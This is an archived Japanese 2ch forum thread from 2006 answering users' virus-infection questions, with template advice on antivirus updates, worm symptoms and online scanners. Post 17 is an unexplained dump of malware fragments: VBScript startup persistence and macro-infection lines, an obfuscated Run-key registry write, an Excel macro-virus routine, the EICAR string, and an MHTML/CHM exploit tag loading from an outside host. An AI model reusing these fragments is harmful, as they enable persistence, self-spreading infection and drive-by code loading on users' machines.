2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【ウィルス情報質問 総合スレッド★Part41】

1 :名無しさん@お腹いっぱい。:2006/12/25(月) 21:00:38
前スレ
【ウィルス情報質問 総合スレッド★Part39】※実質40
http://pc8.2ch.net/test/read.cgi/sec/1163555394/

テンプレ
【使用OS】
【MicrosoftUpdate】
【使用セキュリティソフト】
【セキュリティソフトの定義ファイルは最新の状態であるか】
【ルータの有無】
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
【どんな症状が出るか】
【症状が出る前に何をやったか】
【症状を解決しようとどのような処置を取ったか】
【その他の質問】

2 :名無しさん@お腹いっぱい。:2006/12/25(月) 21:01:09
■■ウィルス定義データは定期的に更新しよう■■
メーカー製パソコンにはウィルス監視ソフトがプリインストールされていることが多いです。
しかし、それだけでは万全ではありません。なぜなら、新しいウィルスが次々と登場するからです!
監視ソフトのデータベースに無ければ、新しいウィルスは検出できません。
そのため、ウィルス監視ソフトには 「データの更新」機能が用意されています。
監視ソフトのメーカーのコンピューターに接続し、最新のウィルス情報を手に入れることが重要なのです。

最近出来た新しいウィルスは、ウィルスデータを更新していなければ検出できません。
ウィルス監視ソフトを導入しているからと安心せず、必ず定期的にデータの更新を行ないましょう!
データ更新をしなければ、監視ソフトも役に立ちません。

■■ワクチンメーカーリンク集■■  ※ウィルス監視ソフトをワクチンソフトとも呼びます。

・トレンドマイクロ株式会社 http://www.trendmicro.co.jp/home/
 製品名:ウイルスバスター2007インターネットセキュリティ他
・株式会社シマンテック http://www.symantec.com/region/jp/
 製品名:NortonAntiVirus、NortonInternetSecurity他
・VINTAGE SOLUTIONS, INC (バーテックスリンクより移管)http://www.vintage-solutions.com/Japanese/
製品名:ANTIDOTE (アンチドート)
・株式会社アラジンジャパン http://www.aladdin.co.jp
 製品名:eSafeProtect
・コンピュータアソシエイツ株式会社 http://www.caj.co.jp/
 製品名:InocuLAN、CheyenneAntiVirus
・マカフィー株式会社 http://www.mcafee.com/jp/default.asp
 製品名:McAfee VirusScan
※プリインストール版のMcAfee VirusScanは、古いバージョンのデータ更新が打ち切られています。
 http://www.nai.com/japan/download/dat3end.asp (リンク切れ)
 該当する場合は諦めてノートンかウィルスバスターを買いましょう。


3 :名無しさん@お腹いっぱい。:2006/12/25(月) 21:01:40
■■ウィルスに感染しないために■■
★ウィルス監視ソフトを常駐させよう。
 →常に見張っていてくれる監視ソフトを導入すれば、あなたの負担もグッと減ります。
★知らない人から届いた添付ファイルに注意!
 →知らない人からファイルをもらう理由はありません。
★添付ファイルのファイル名だけで信用しない!
 →ファイル名だけでは中身は分かりません。
★知り合いからの添付ファイルでも、注意しよう!
 →アドレス帳に登録されている人に送信するウィルスもあるので注意が必要です。
★怪しいファイルをダウンロードしない。
 →怪しいファイルにウィルスが混入しているケースもよくあることです。
  怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。
■■ウィルスを発見・感染したら届け出を! ■■
 もしウィルスを発見したり、感染してしまったら届け出をしましょう!
★IPAセキュリティセンター コンピュータウイルスに関する届出について
 http://www.ipa.go.jp/security/outline/todokede-j.html
 こちらに届け出の方法などが記載されています。
 E-mail・郵送・FAXが利用できますので、ぜひ届け出ましょう。


4 :名無しさん@お腹いっぱい。:2006/12/25(月) 21:02:11
W32.Sasser.Wormとその亜種にご注意!!
このウイルスは、MS04-011 の悪用を試みるワームです。
ランダムに選択された IPアドレスを持つコンピュータを走査し、拡散します。
亜種も出現しているので、 出現後にウイルス監視ソフトの定義ファイルを 更新していない場合、 ウイルススキャンで検出できません。
最新の定義ファイルに更新しましょう。
●症状
ネットワークの反応が遅く、 メッセージボックスのシャットダウンへのカウントダウンが始まります。
下に「lsass.exeの異常終了です」などと表示されます。
もし「RPCの異常終了です」ならば、次のBlaster/Welchiaです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
●予防策
MS04-011のパッチを適用する。
http://www.microsoft.com/japan/technet/security/bulletin/MS04-011.mspx
●下記サイトにも情報が掲載されているので、参照して下さい。
Sasser ワームについてのお知らせ
http://www.microsoft.com/japan/security/incident/sasser.mspx
* Windows XP編
http://www.microsoft.com/japan/security/incident/sasser_xp.mspx
* Windows 2000編
http://www.microsoft.com/japan/security/incident/sasser_2k.mspx
* シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.worm.html
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.b.worm.html
* トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.B
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.C
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.D

5 :名無しさん@お腹いっぱい。:2006/12/25(月) 21:02:44
Blaster / Welchia についての情報
このウイルスは、MS03-026 の悪用を試みるワームです。
●症状
ネットワークの反応が遅く、
シャットダウンへのカウントダウンが始まります。
メッセージボックスの下に「RPCの異常終了です」などと表示されます。
もし「lsass.exeの異常終了です」ならば、上のSasserです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。

Blasterにはいくつかの亜種があります。
マイクロソフトの解説ページ
http://www.microsoft.com/japan/technet/security/virus/blaster.asp
Blaster トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A
Blaster シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.blaster.worm.html
Welchia トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_NACHI.A
Welchia シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.welchia.worm.html


6 :名無しさん@お腹いっぱい。:2006/12/25(月) 21:03:15
「W32/Netsky」ウイルスの亜種(Netsky.Q)に関する情報
http://www.ipa.go.jp/security/topics/newvirus/netsky-q.html
・差出人アドレスは詐称されます。
・件名: 以下のいずれかひとつ
  * Mail Delivery System (<受取人メールアドレス>)
  * Failure (<受取人メールアドレス>)
  * Delivered Message (<受取人メールアドレス>)
  * Deliver Mail (<受取人メールアドレス>)
  * Delivery Error (<受取人メールアドレス>)
・添付ファイル名: { message、data、mail、msg } + { ランダムな数字、なし } + { .pif , .zip }
   例: date7386.pif 、 message19392.zip など

「W32/Mydoom」(別名:Novarg)ウイルスに関する情報
http://www.ipa.go.jp/security/topics/newvirus/mydoom.html
・差出人アドレス(From): コンピュータから取得できたアドレスを詐称。
・件名:(以下の候補のいずれかを選択)
  * Error
  * Status
  * Server Report
  * Mail Transaction Failed
  * Mail Delivery System
  * hello
  * hi
  [ 任意の文字列 ]
・本文:(以下の候補のいずれかを選択)
  "test"
  "The message contains Unicode characters and has been sent as a binary attachment."
  "The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment."
  "Mail transaction failed. Partial message is available."
  [ 任意の文字列 ]  [ 空白 ]
・添付ファイル名: ランダムなアルファベット


7 :名無しさん@お腹いっぱい。:2006/12/25(月) 21:03:50
「既出です」Q&A
Q1.ノートンを使っていたら、2chのログからウィルスを発見しました。
   ノートンをインストールしたら2chに書けなくなりました。
A1.ここを読みましょう。
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8

Q2.ウィルスを検出しましたが、どんなウィルスかわかりません
A2.各アンチウィルスベンダーのウィルス情報をまず確認しましょう。
・Symantec Security Response
http://www.symantec.com/region/jp/sarcj/vinfodb.html
・Trend Micro ウイルス情報
http://www.trendmicro.co.jp/vinfo/virusencyclo/default.asp
・McAfee ウイルス情報
http://www.mcafeesecurity.com/japan/security/vlibrary.asp

Q3.「世界の中心で生まれてきてすいません」という表示が出てきました 。
  デスクトップの背景が蓮画像になってしまいます 。
A3.Winny関連ウィルスですので、Download板へどうぞ。
  ブラクラに仕込まれている場合もあるので、心当たりがなくても一度参照して下さい。
Winnyを狙ったワーム・ウイルス情報 Part59
http://tmp6.2ch.net/test/read.cgi/download/1165372312/

Q4.アンチウィルスソフトを持っていないのですが、無料のものはないですか?
A4.このスレでフリーのアンチウィルスソフトを取り扱っていますので確認して下さい。
フリーのアンチウイルスソフト Part9
http://pc8.2ch.net/test/read.cgi/sec/1158730729/

Q5.ホームページが変なページになってしまいます
A5.ウィルスではなくスパイウェアですので、こちらへどうぞ
エロサイトを見たら…助けてください!Part62
http://pc7.2ch.net/test/read.cgi/pcqa/1150380799/


8 :名無しさん@お腹いっぱい。:2006/12/25(月) 21:04:22
感染の疑いがあり自分のアンチウイルスソフトで反応がない場合
他社のオンラインスキャンをするとウイルスが検出されることがあります

カスペルスキー:オンライン ウイルス&スパイウェアスキャナ 
http://www.kaspersky.co.jp/scanforvirus/
シマンテック・セキュリティチェック
http://www.symantec.com/region/jp/securitycheck/index.html
ウイルスバスターオンラインスキャン
http://www.trendmicro.co.jp/hcall/index.asp
トレンド フレックス
http://trendflexsecurity.jp/free_security_tools/housecall_free_scan.php
削除可
BitDefender Online Scanner
http://www.bitdefender.com/scan8/ie.html
削除可
Panda ActiveScan
http://www.pandasoftware.com/activescan/jp/activescan_principal.htm
削除可
F-Secure オンラインスキャナ
http://www.f-secure.co.jp/v-descs/disinfestation.html
ウイルスチェイサー for WEB
http://www.viruschaser.jp/support_online.html

関連スレッド
オンラインによるウイルスチェックサービス
http://pc8.2ch.net/test/read.cgi/sec/1031073684/

※感染している場合ウイルスによっては外部と通信を行うものもありますので
パーソナルファイヤーウォール等でスキャンサイト以外の接続を遮断することをおすすめします


9 :名無しさん@お腹いっぱい。:2006/12/25(月) 21:05:22
関連スレッド
セキュリティ初心者質問スレッドpart79
http://pc8.2ch.net/test/read.cgi/sec/1165470988/
Winnyを狙ったワーム・ニュイルス情報 Part59
http://tmp6.2ch.net/test/read.cgi/download/1165372312/
☆☆トロイの木馬☆☆3台目
http://pc8.2ch.net/test/read.cgi/sec/1132660933/
sasser【スタコラサッサ】sasser Part2
http://pc5.2ch.net/test/read.cgi/sec/1083839516/
Blasterスレ part5
http://pc8.2ch.net/test/read.cgi/sec/1065964513/
【緊急!】ウィルス即行駆除方法【助けて!】
http://pc8.2ch.net/test/read.cgi/sec/1091174837/
アンチウィルスソフトのウィルス誤検出
http://pc8.2ch.net/test/read.cgi/sec/1027753135/
毎日ウィルスメールが送られてくるのですが・・2通目
http://pc8.2ch.net/test/read.cgi/sec/1086494732/
【分析】HijackThis【研究】
http://pc8.2ch.net/test/read.cgi/sec/1091346741/


関連スレは次スレに移行してる場合もあります。


質問する前に検索しましょう
http://www.yahoo.co.jp/
http://www.google.co.jp/

10 :名無しさん@お腹いっぱい。:2006/12/25(月) 21:11:06
テンプレここまで

       ∧_∧
      ( ・∀・)   トロイ〜ワーム!!!
      ( ⊃┳⊃
     ε(_)ヘ⌒ヽフ
     (   ( ・ω・)
≡≡≡ ◎―◎⊃⊃


テンプレここまで


11 :名無しさん@お腹いっぱい。:2006/12/25(月) 22:36:51
>1 おつ〜
 :   :: ゚   : 。   〜  彡ミ
:  ゚     :。   〜  彡ミ彡ミ
  : 。 〜   : ゚  :: 彡ミ彡ミミミ
: . ::: 。 〜 : : .. ゚ 彡彡ミ彡ミミミ
. ゚ 〜 :: .  : :. 。  ;:ヽ|i゚∀゚ i|ノ アヒャヒャヒャ
゚  ::  ゚〜 : 。  :  : : |i!iハlハl!|

12 : ◆N9P3SuvBPo :2006/12/25(月) 22:41:21
>1
おつかれさ〜ん

13 :名無しさん@お腹いっぱい。:2006/12/25(月) 22:43:02

  ○< ̄ ̄\
     γ    )
     [二二二]
  γ⌒ヽ从*‘ー‘从<Merry Xmasだぎゃ!
  |   ∩3\,,/[]つ
  |   Y__:_)
.  \__(__)__)

14 :名無しさん@お腹いっぱい。:2006/12/25(月) 23:25:37
>>1
乙..._〆(゚▽゚*)

15 :名無しさん@お腹いっぱい。:2006/12/26(火) 02:29:22
どうでもいい事だが
Vistaへの乗り換えに自信のない人に自信を持ってお勧めできる無料OS、それがFedora Core

サンプル動画
高画質 http://stage6.divx.com/members/225743/videos/1032106
低画質 http://www.youtube.com/watch?v=ksxADo-4Q4k
サンプル画像
http://sylphys.ddo.jp/upld2nd/pc2/src/1166337336209.jpg
http://sylphys.ddo.jp/upld2nd/pc2/src/1166337908690.jpg
http://www.lynucs.org/index.php?screen_id=16160218054558aaec4d948&p=screen
http://www.lynucs.org/index.php?screen_id=12170238984554b554f0ad2&p=screen

FedoraというのはLinuxの一種で日本で最も普及しているLinux
インストールは ftp://ftp.sfc.wide.ad.jp/pub/Linux/Fedora/6/i386/iso/FC-6-i386-DVD.iso
のisoをDVDに焼いてパソコンを再起動すればいい
注意としてDVDはイメージとしてisoを焼くようにしないといけない
http://linux2ch.is.land.to/index.php?InstallCDCreationInfo が参考になるぞ
CDブート後の手順は http://itpro.nikkeibp.co.jp/article/COLUMN/20061101/252399/?ST=lin-os&P=2 を見てくれ。
アドバイスだが「SELinuxの設定」は無効にしておくことをお勧めする。
Windowsの管理者(Administrator)にあたるユーザーは、Linuxでは「root」という名前だ
そのままだとファイラーの設定が良くない→ http://linux2ch.is.land.to/index.php?GNOMEFAQs#a3077218
ゴミ箱には保存場所の記録がないらしい(KDEというのならある)
特許の関係で動画と音楽の再生に制限がある。divxとかはxine、mplayer,vlcなど自分でソフトを入れてくれ
ソフト更新ツールが少し重くて遅いことは勘弁してほしい
ウイルスの心配のないネット生活をエンジョイだ

初心者質問大歓迎掲示板↓
http://pc8.2ch.net/test/read.cgi/linux/1165323756/

実はMandriva Linux(Mandrake)の方が優れているとばっちゃが言ってた
http://pc8.2ch.net/test/read.cgi/linux/1099123314/768n-

16 :1:2006/12/26(火) 07:53:02
スレタイを【】で囲ってしまった orz


17 :名無しさん@お腹いっぱい。:2006/12/26(火) 08:55:23
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

18 :名無しさん@お腹いっぱい。:2006/12/26(火) 22:50:34
【使用OS】 デスクトップ
【MicrosoftUpdate】 127.0.0.1にリダイレクトされて出来ない
【使用セキュリティソフト】 F-Secure InternetSecurity 2007
【セキュリティソフトの定義ファイルは最新の状態であるか】 はい
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 できない
【どんな症状が出るか】 EXEファイル実行不可
【症状が出る前に何をやったか】 友達から届いたメールの添付ファイルを開いた
【症状を解決しようとどのような処置を取ったか】 あわててスイッチ切って再起動した
【その他の質問】 友達から届いたから安心して開いたんですが、ウイルスなんでしょうか?

19 : ◆N9P3SuvBPo :2006/12/26(火) 23:00:19
>18
まず、↓なw
>【使用OS】 デスクトップ
それPCの形態でOSではないから。

>【どんな症状が出るか】 EXEファイル実行不可
その拡張子がexeのファイルを実行しようとしたとき、何かエラーメッセージ
とかは出ない?
拡張子をcomに変えても実行は出来ないの?
手っ取り早い解決方法としてリカバリを奨めるけど?

>【その他の質問】 友達から届いたから安心して開いたんですが、ウイルスなんでしょうか?
友達からだろうと添付ファイルはウイルスと疑ってかかれ。

20 :18:2006/12/26(火) 23:13:08
>>19
バックアップは取ってあるからリカバリします。
自分のスキルでは駆除は無理そうですので。

21 :名無しさん@お腹いっぱい。:2006/12/27(水) 02:39:06
>>984
見受けたところあなた様にスキルがあるようには思えませんが、
パソコンの前で王様気取りになってらっしゃるだけではないですか?
裸の王様

22 :名無しさん@お腹いっぱい。:2006/12/27(水) 02:43:20
俺はルータもAVもいれているから気にする必要性は無いと思うんだけど、98や2000、XPで
ルータも持たずFWも持たず接続する人もいるわけでしょ。その場合は・・ってこと何だけど。
祈るしかないわけですか。でもその間に感染ってあまり聞かないような気がするなっておもうんだけど。
OSアップデートのファイルだけ他のPCから落としてRに焼いてインストールするってできますか
またはリカバリーCD自体を作るとかかなぁ?俺にはできんけど

俺は入れ直しかノートンゴースト使ってるけど



だれかおしえてちょんまげ

やっぱり2000で98でルータ無しFW無しはまずいんだね、
そこまでは俺も知ってたけど、でもどのような感染経路で感染するの?

OSアップデートのファイルだけ他のPCから落としてRに焼いてインストールするってできますか
またはリカバリーCD自体を作るとかかなぁ?俺にはできんけど

それとさ、なんでこれ41なの?前39だったよね・・

23 :これいれるんじゃなかったの:2006/12/27(水) 02:45:31
>>982
乙です 私は異論ありません
あとBOTに関してのテンプレを入れたほうがいいのではないかと思います
以下サイバークリーンセンターからの引用ですがいかがなものでしょうか

ボットにご注意!!
ボットとは、コンピュータを悪用することを目的に作られた悪性プログラムで、コンピュータに感染すると、
インターネットを通じて悪意を持った攻撃者(以下「攻撃者」という)が、あなたのコンピュータを外部から遠隔操作します。
感染すると、この攻撃者があなたのコンピュータを操り「迷惑メールの大量配信」、「特定サイトの攻撃」等の迷惑行為をはじめ、
あなたのコンピュータ内の情報を盗み出す「スパイ活動」など深刻な被害をもたらします。
この操られる動作が、ロボット(Robot)に似ているところから、ボット(BOT)と呼ばれています。

ボットに感染したコンピュータは、攻撃者が用意した指令サーバなどに自動的に接続され、
数十〜数百万台のボット感染コンピュータを従えた「ボットネットワーク」と言われる巨大ネットワークを形成します。
感染したコンピュータは、攻撃者からの命令を待ち受け、攻撃者が下す命令によって、攻撃者の意のままに数十〜数百万台の感染コンピュータが操られた結果、
フィッシング目的などのスパムメールの大量送信や、特定サイトへのDDoS攻撃などに利用され、とても大きな脅威となります。
このため、感染コンピュータを使用しているユーザーは、知らぬ間に犯罪の踏み台にされ、「被害者」であると同時に「加害者」にもなってしまうのです
〜サイバークリーンセンター より引用〜

サイバークリーンセンター ボットとは
https://www.ccc.go.jp/bot/index.html
TREND MICRO ボット系ウイルス対策Web
http://www.trendmicro.com/jp/security/web/archive/overview/bot.htm
インターネット上の新たな脅威「ボット(bot)」に気をつけろ!(上)
http://itpro.nikkeibp.co.jp/free/ITPro/OPINION/20041215/153889/?ST=security

24 :名無しさん@お腹いっぱい。:2006/12/27(水) 02:46:12
新しいテンプレ(一部追記)は以下の通りで異論は無いでしょうか。

【使用OS】
【MicrosoftUpdate】
【使用セキュリティソフト】
【セキュリティソフトの定義ファイルは最新の状態であるか】
【ルータの有無】
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
【どんな症状が出るか】
【症状が出る前に何をやったか】
【症状を解決しようとどのような処置を取ったか】
【その他の質問】

>【ルータの有無】
ぶっちゃけこれ要らないんじゃないと思う人もいるけど、
質問者がWindows2000でルータ無しでFWソフトも無しの環境で、
リカバリしなくちゃいけないような症状に陥っている場合、
それでリカバリしたは良いけど、その直後にネットに繋いで即再感染
という自体も有り得るので。(その際はルータか、FW付きアンチウイルスソフトの購入を奨める)
WindowsXPの場合はデフォルトでFWが入ってる(SP2の場合はデフォルトで有効になってる)
から、こちらのOSの場合はルータが無くてもFWを有効にさえしとけば、外部からの
侵入はとりあえず遮断できる。

25 :名無しさん@お腹いっぱい。:2006/12/27(水) 03:15:08
こいつ>>23何者?


26 :名無しさん@お腹いっぱい。:2006/12/27(水) 04:27:40
現在の更新の情報
合計時間: 28 s

- Vps: 更新されました
(前のバージョン: 0662-1, 更新後のバージョン: 0662-2)

サーバー: download6.avast.com (67.15.0.83)
ダウンロード・ファイル: 5 (1.24 KB)
ダウンロード時間: 8 s

27 :1:2006/12/27(水) 07:24:45
>>23
それ書いたの俺
テンプレにいれるのは時期が早いかなとおもったから
俺が書いたのはコピペだし 住人が知恵をだしあって練られたものを入れたかったから

このスレが41なのは38が重複して前スレが実質40だったからこのスレで番号修正しただけ


28 :名無しさん@お腹いっぱい。:2006/12/27(水) 07:35:56
>>27
>1おつです 17←こいつをどうにかしてください

29 :名無しさん@お腹いっぱい。:2006/12/27(水) 15:28:08
【使用OS】
XP home
【MicrosoftUpdate】
してる
【使用セキュリティソフト】
VB2006
【セキュリティソフトの定義ファイルは最新の状態であるか】
期限切れで最新ではない
【ルータの有無】
なし
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
検出なし
【どんな症状が出るか】
nyフォルダ内のファイルが全て画像(bmp)になる
その画像↓
http://up.mugitya.com/img/Lv.1_up69172.bmp
【症状が出る前に何をやったか】
nyで動画ファイル落として実行
【症状を解決しようとどのような処置を取ったか】
HDにつながってるUSB引っこ抜いた
ネット切断

30 :名無しさん@お腹いっぱい。:2006/12/27(水) 15:35:08
>>29
http://tmp6.2ch.net/test/read.cgi/download/1165372312/
Winnyを狙ったワーム・ニュイルス情報 Part59

31 :名無しさん@お腹いっぱい。:2006/12/27(水) 16:02:18
動画ファイルをどうやって「実行」するのか知りたい……。

32 :名無しさん@お腹いっぱい。:2006/12/27(水) 16:17:47
「メッセンジャー」からお知らせです、と
しつこく送られてくるものに、
どう対処したら良いのでしょうか?
どなたか、ご指導くださいませ?

33 :名無しさん@お腹いっぱい。:2006/12/27(水) 16:28:12
>>32
>どなたか、ご指導くださいませ?
なんで、疑問形で終わる?

とりあえず、何の事だか全然分からん。

34 :名無しさん@お腹いっぱい。:2006/12/27(水) 16:34:00
>>32
あんいんすと〜る

35 :名無しさん@お腹いっぱい。:2006/12/27(水) 17:32:31
>>29
今時ルーターもなけりゃウィルスソフトのUPDATEもしていない。
こんな環境でnyする奴っているんだなw



36 :名無しさん@お腹いっぱい。:2006/12/27(水) 18:25:04
ゴミどもうだうだいってねーでちゃんと答えろや
何のためにこの場所提供してやってんだよ
この世のクズが

37 : ◆N9P3SuvBPo :2006/12/27(水) 18:30:42
>32
これって俗に言うメッセンジャースパムとか言う奴ではないでしょうかね?

>29
P2P系とはあまり関わりたくないものですね。
XPでルータ無しだとすると、リカバリ後ネットに繋ぐ前に…
あとは任せたw

38 :名無しさん@お腹いっぱい。:2006/12/27(水) 19:05:21
俺はルータもAVもいれているから気にする必要性は無いと思うんだけど、98や2000、XPで
ルータも持たずFWも持たず接続する人もいるわけでしょ。その場合は・・ってこと何だけど。
祈るしかないわけですか。でもその間に感染ってあまり聞かないような気がするなっておもうんだけど。
OSアップデートのファイルだけ他のPCから落としてRに焼いてインストールするってできますか
またはリカバリーCD自体を作るとかかなぁ?俺にはできんけど

俺は入れ直しかノートンゴースト使ってるけど



だれかおしえてちょんまげ

やっぱり2000で98でルータ無しFW無しはまずいんだね、
そこまでは俺も知ってたけど、でもどのような感染経路で感染するの?

OSアップデートのファイルだけ他のPCから落としてRに焼いてインストールするってできますか
またはリカバリーCD自体を作るとかかなぁ?俺にはできんけど


39 :名無しさん@お腹いっぱい。:2006/12/27(水) 19:43:05
Windows XP SP2 適用済みインストールイメージの作成方法
http://support.microsoft.com/kb/884746/ja

ワームに感染しない Windows 2000/XP のインストール手順
http://tomcat.nyanta.jp/t_html/contents/wininstall.shtml


40 :名無しさん@お腹いっぱい。:2006/12/27(水) 20:01:29
ネットワークワームがポートの開いているネットワークサービスにパケットを送信してバッファオーバーフローが発生。
この時点でレジスタ内の戻りアドレスが偽装されているので
メモリ上のそのアドレスから実行されて何でもインストールされてしまう。

41 :名無しさん@お腹いっぱい。:2006/12/27(水) 20:44:22
>>39
センキューベルマエロッチ

42 :名無しさん@お腹いっぱい。:2006/12/27(水) 20:55:02
SP2適用済イメージ作成段階でエラー出るかもしれませんが、解決方法は・・・教えませんよ(´・ε・`)

43 :名無しさん@お腹いっぱい。:2006/12/27(水) 21:05:42
【使用OS】 windows XP
【MicrosoftUpdate】 してます
【使用セキュリティソフト】 ウイルスセキュリティー
【セキュリティソフトの定義ファイルは最新の状態であるか】 最新です
【ルータの有無】 無し
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 Win32.Bolzano.5396.b
【どんな症状が出るか】 わかりません
【症状が出る前に何をやったか】mp3が入ったzipのダウンロード&wavをmp3にエンコードするフリーソフト をインストールしました
【症状を解決しようとどのような処置を取ったか】 ウイルスセキュリティーで削除しました
【その他の質問】このウイルスに感染するとどうなるのですか

44 :名無しさん@お腹いっぱい。:2006/12/27(水) 21:08:50
>>43
ソースネクストのサイトにウイルス情報公開してんじゃね?

45 :名無しさん@お腹いっぱい。:2006/12/27(水) 21:25:14
>>43
ttp://www.symantec.com/region/jp/sarcj/data/w/w32.bolzano.html
これかな?

46 :名無しさん@お腹いっぱい。:2006/12/27(水) 21:41:55
>>44
>>45
ありがとうございました
読んでも理解出来ないのですが...
XPでは影響ないのでしょうか?

ひとつ思い出したのですが、ウイルスセキュリティーのファイアーウォールの履歴が残らない現象が続いてました
これ関係ありそうですか?どなたかご存知の方教えてください

今は昨日バージョンアップしたばかりで昨日からの履歴は残っています

47 :名無しさん@お腹いっぱい。:2006/12/27(水) 21:43:39
>>46
とりあえず心配なら>>8の各種オンラインスキャンを試してみたら?

48 : ◆N9P3SuvBPo :2006/12/27(水) 21:49:33
>43
>ウイルス名:Win32.Bolzano.5396.b
検出された場所は?

>46
>ファイアーウォールの履歴が残らない現象
これ、何時からなってた?
43のWin32.Bolzano.5396.bが検出される前・後?

49 :名無しさん@お腹いっぱい。:2006/12/27(水) 21:49:57
>>47
そうしてみます
ありがとうございました

50 :名無しさん@お腹いっぱい。:2006/12/27(水) 21:56:57
>>48
WINDOWSの中のrepairです
DS_SOFTWAREというファイルでした

Bolzanoが検出されるずっと前から履歴が残らない状態でした
ウイルスセキュリティーを再インストールすれとしばらくは履歴が残っていました
何をきっかけに履歴が残らないのか分らないのですが
Outlook Express が圧縮するようにメッセージが出てました(関係ないかも)

51 : ◆N9P3SuvBPo :2006/12/27(水) 22:12:15
>50
削除したんなら、何の心配はいらないと思うけど、それでも
心配なら>47の指示をやって、何も検出されなかったら
しばらく様子見かな?

そして
FWの履歴が残らなくなってる件については、
サポートに問い合わせてみたほうが良いと思われます。
もしくはグーグルで検索して原因を調べるとか。

52 :名無しさん@お腹いっぱい。:2006/12/27(水) 22:29:23
このファイル
Doom_2_wad_cracked_by_DFT_S60_v1.0.sis

http:〜〜〜〜みたいにしたやつある?

53 :名無しさん@お腹いっぱい。:2006/12/27(水) 22:36:21
>>51
ありがとうございました

54 :名無しさん@お腹いっぱい。:2006/12/28(木) 01:30:40
>>42
それは困るぞ!それに俺98SEなんだけど・・・・・・・・・・・・・・・・・・・・うぉぉぉっぉぉお
どうしたらいい



55 :名無しさん@お腹いっぱい。:2006/12/28(木) 13:36:23
shareEDGEのサイトにあるオンラインスキャンを実行すると前スレの262と同じ結果が
でてSmiley Sourceが検出されるのですがこのオンラインスキャンサービスでは削除
できません。
spybotでは検出されません。X-Cleaner買ってね♪ってことですかねww



56 :名無しさん@お腹いっぱい。:2006/12/28(木) 14:13:41
>>55
下記のURLにたくさんフリーのアンチスパイウェアソフトがあるので、
運が行ければどれかで駆除できるかも。w
まあ、いちいち試してみるのが面倒なら、最初からおとなしくX-Cleaner買う。
http://cowscorpion.com/Software/secu02s.html



57 :名無しさん@お腹いっぱい。:2006/12/28(木) 17:39:24
SpyMarshalってプログラムがかってにインストールされました削除法おしえてください
検索しても外国のサイトしかでません
日本語訳したんですけど 危ないウィルスとしかわかりません
おねがいします!!

58 :名無しさん@お腹いっぱい。:2006/12/28(木) 18:02:10
>>57
http://www.superantispyware.com/?
で駆除汁

59 :名無しさん@お腹いっぱい。:2006/12/28(木) 18:39:58
>>57
BraveSentryのクローンらしいね いわゆるインチキセキュりティソフト
exploitを利用してるみたいだから各種updateは最新に
BraveSentryならこれで駆除できるみたいだけど
http://wiki.higaitaisaku.com/wiki.cgi?page=SmitfraudFix+%A4%CE%BB%C8%A4%A4%CA%FD
あとcounterspyが対応してるらしい ベータもあるけど評判わるいからなあ

それとマルチ乙w


60 :名無しさん@お腹いっぱい。:2006/12/29(金) 10:22:54
>>56
アリガト♪
買うのくやしいから、なんとか手動で駆除できないかな。
まぁそんなに悪質なものでないので無視しときます。


61 :55,60:2006/12/29(金) 16:03:23
検索して解決しました。
使っているカスペルスキーインターネットセキュリティーのレジストリエントリが誤検出されるようです。
カスペルスキーのスレにもレスしときましたが、前スレの262さんKISを使っていませんか。



62 :55,60:2006/12/29(金) 16:10:12
×前スレ262
○前スレ261
カスぺいれてるってかかれてますねw

33 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

